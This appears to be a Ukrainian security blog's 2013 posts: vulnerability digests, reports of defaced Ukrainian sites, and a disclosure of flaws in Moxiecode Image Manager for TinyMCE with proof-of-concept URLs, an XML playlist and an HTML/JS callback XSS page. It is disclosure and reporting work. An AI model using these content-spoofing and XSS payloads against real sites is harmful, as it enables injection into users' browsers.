Websecurity - Веб безпека

Виявлені уразливості безпеки в Apache suexec.

Уразливі продукти: Apache 2.2.

Підвищення привілеїв, обхід захисту.

• Apache suEXEC privilege elevation / information disclosure (деталі)

11.06.2013

У квітні, 14.04.2013, я знайшов Content Spoofing, Cross-Site Scripting та Full Path Disclosure уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MCImageManager для TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

16.08.2013

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flvPlayer.swf(з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Full Path Disclosure (WASC-13):

Повний шлях в кукісах MCManager_im_lastPath і MCManagerHistoryCookie_im.

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії.

В січні відбувся новий масовий взлом сайтів на сервері HostPro. Він тривав на протязі 2011 - 2013 років: 12.08.2011 (1 сайт), від 05.04.2012 до 03.07.2012 (25 сайтів) та від 11.01.2013 до 08.06.2013 (144 сайти). Восьмий масовий взлом сайтів на сервері HostPro відбувся раніше.

Був взломаний сервер української компанії HostPro. Взлом складався з багатьох невеликих дефейсів та трьох крупних дефейсів сайтів.

Всього було взломано 170 сайтів на сервері хостера HostPro (IP 193.169.188.27). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт mon-ark.gov.ua, який був взломаний двічі - в минулому і поточному році.

З зазначених 170 сайтів 79 сайтів були взломані хакером 3xp1r3, 6 сайтів хакером omarxarmy, 13 сайтів хакерами з Anonymous Albania, 5 сайтів хакером X_MAN 3R3R, 2 сайти хакером Hmei7, 30 сайтів хакером BADI, 4 сайти хакером misafir, 20 сайтів хакером Haranobu, 3 сайти хакером control_7rb та по 1 сайту хакерами SiR Abdou, Pak Cyber Eaglez, Mr Exploits, HeRoTurk, Pakhtun72, s13doeL, Ev!LsCr!pT_Dz, SnIpEr_39, iskorpitx.

При крупних дефейсах, як у випадку 3xp1r3, BADI і Haranobu, сайти могли бути атаковані хакерами через взлом серверу хостінг провайдера. А всі невеликі дефейси по одному або декілька сайтів явно були зроблені при взломах окремих сайтів. Також не виключена можливість використання уразливостей на сервері для доступу до інших сайтів.

Виявлені численні уразливості безпеки в Microsoft .NET і Silverlight.

Уразливі продукти: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, 4.5, Silverlight 5.

Критичні уразливості в .NET і Silverlight.

• Microsoft Security Bulletin MS13-052 - Critical Vulnerabilities in .NET Framework and Silverlight Could Allow Remote Code Execution (2861561) (деталі)

В даній добірці експлоіти в веб додатках:

• Hikvision IP Cameras Overflow / Bypass / Privilege Escalation (деталі)
• Trustport Webfilter 5.5.0.2232 - Directory Traversal Vulnerability (деталі)
• Ruby Gem Rgpg 0.2.2 Command Injection Vulnerability (деталі)
• HP Data Protector Arbitrary Remote Command Execution (деталі)
• Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах FlagEm, Duplicator та Bit51 Better WP Security. Для котрих з’явилися експлоіти. FlagEm - це плагін для встановлення флагів, Duplicator - це плагін для клонування сайта, Bit51 Better WP Security - це плагін для захисту сайта.

• WordPress FlagEm Cross Site Scripting (деталі)
• WordPress Duplicator 0.4.4 Cross Site Scripting (деталі)
• Bit51 Better WP Security Plugin XSS / Command Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

03.08.2013

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 27.0, Chromium 27.0.

Обхід захисту, підвищення привілеїв, DoS, використання пам’яті після звільнення, витік інформації, пошкодження пам’яті.

• chromium-browser security update (деталі)

15.08.2013

Додаткова інформація.

• chromium-browser security update (деталі)

У серпні, 06.08.2013, вийшов Mozilla Firefox 23. Нова версія браузера вийшла через півтора місяця після виходу Firefox 22.

Mozilla офіційно випустила реліз веб-браузера Firefox 23, а також мобільну версію Firefox 23 для платформи Android. Відповідно до шеститижневого циклу розробки, реліз Firefox 24 намічений на 17 вересня, а Firefox 25 на 29 жовтня.

Також був випущений Seamonkey 2.20 та оновлені коригувальні релізи гілок із тривалим терміном підтримки - Firefox 17.0.8 і Thunderbird 17.0.8.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 23.0 усунуто 13 уразливостей, серед яких 4 позначені як критичні, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок. Причому ця кількість - це саме патчі (Mozilla типово виправляє по декілька дір за один патч).

• Релиз Firefox 23 (деталі)

В даній добірці уразливості в веб додатках:

• HP Intelligent Management Center v5.1 E0202 topoContent.jsf Non-Persistent Cross-Site Scripting (деталі)
• HP Intelligent Management Center (iMC), iMC TACACS+ Authentication Manager (TAM), and iMC User Access Manager (UAM), Cross Site Scripting (XSS), Remote Code Execution (деталі)
• Magnolia CMS multiple access control vulnerabilities (деталі)
• Multiple XSS Vulnerabilities in Xaraya (деталі)
• SQL Injection in Dolphin (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.lr-pl.gov.ua (хакером Dr.SHA6H) - 21.06.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://perechyn-rada.gov.ua (хакером Dr.HaCkEr) - 24.06.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ovsyanukivka.org.ua (хакером Algerian To The Core) - 29.03.2013, зараз сайт вже виправлений адмінами
• http://lifefree.com.ua (хакером HACKROOT) - 02.08.2013, зараз сайт вже виправлений адмінами
• http://big-heart.com.ua (хакером HACKROOT) - 04.08.2013, зараз сайт вже виправлений адмінами